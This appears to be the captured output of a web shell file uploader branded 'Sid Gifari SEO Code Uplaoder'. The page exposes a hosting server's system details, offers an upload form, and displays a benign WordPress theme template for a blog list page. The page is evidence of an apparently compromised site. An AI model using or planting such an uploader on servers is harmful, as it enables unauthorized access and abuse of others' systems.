Sid Gifari SEO Code Uplaoder

Sid Gifari SEO Code Uplaoder

Telegram:sidgifari

Upload File:
HEX
HEX
Server: LiteSpeed
System: Linux premium311.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: scepbisv (1262)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/scepbisv/demo.sceptrepro.com/wp-content/themes/loanlift/page-template/blog-list-page.php
<?php
/* Template Name: Blog List Page */
/**
 * The main template file
 *
 * This is the most generic template file in a WordPress theme
 * and one of the two required files for a theme (the other being style.css).
 * It is used to display a page when nothing more specific matches a query.
 * E.g., it puts together the home page when no home.php file exists.
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package loanlift
 */
get_header();
$args = array(
    'post_type' => 'post',
    'order'     => 'ASC'
);
$query = new \WP_Query($args);
if (loanlift_options('loanlift_blog_layout') == 'full-width' || !is_active_sidebar('sidebar-1')){
    $blog_class = 'col-xl-12';
}else{
    $blog_class = 'col-xl-8';
}
if (loanlift_options('loanlift_blog_list_banner',true)) :
echo get_template_part('template-parts/banner');
endif;
?>
<main id="primary" class="site-main">
    <div class="blog-list-section">
        <div class="container">
            <div class="row gutter-y-30">
                <?php if (loanlift_options('loanlift_blog_layout') == 'left-sidebar') :
                    get_sidebar();
                endif; ?>
                <div class="<?php echo esc_attr($blog_class);?>">
                    <?php
					if ($query->have_posts()) :
						while ($query->have_posts()) :
							$query->the_post();
						    get_template_part( 'template-parts/blog/content','list');
						endwhile;
						loanlift_pagination();
					else :
						get_template_part( 'template-parts/content', 'none' );
					endif;
					?>
                </div>
                <?php if (loanlift_options('loanlift_blog_layout') == 'right-sidebar') :
                    get_sidebar();
                endif; ?> 
            </div>
        </div>
    </div>
</main>
<?php if(loanlift_options('loanlift_enable_blog_cta_section')):
loanlift_blog_cta_section(); endif;?>
<?php
get_footer();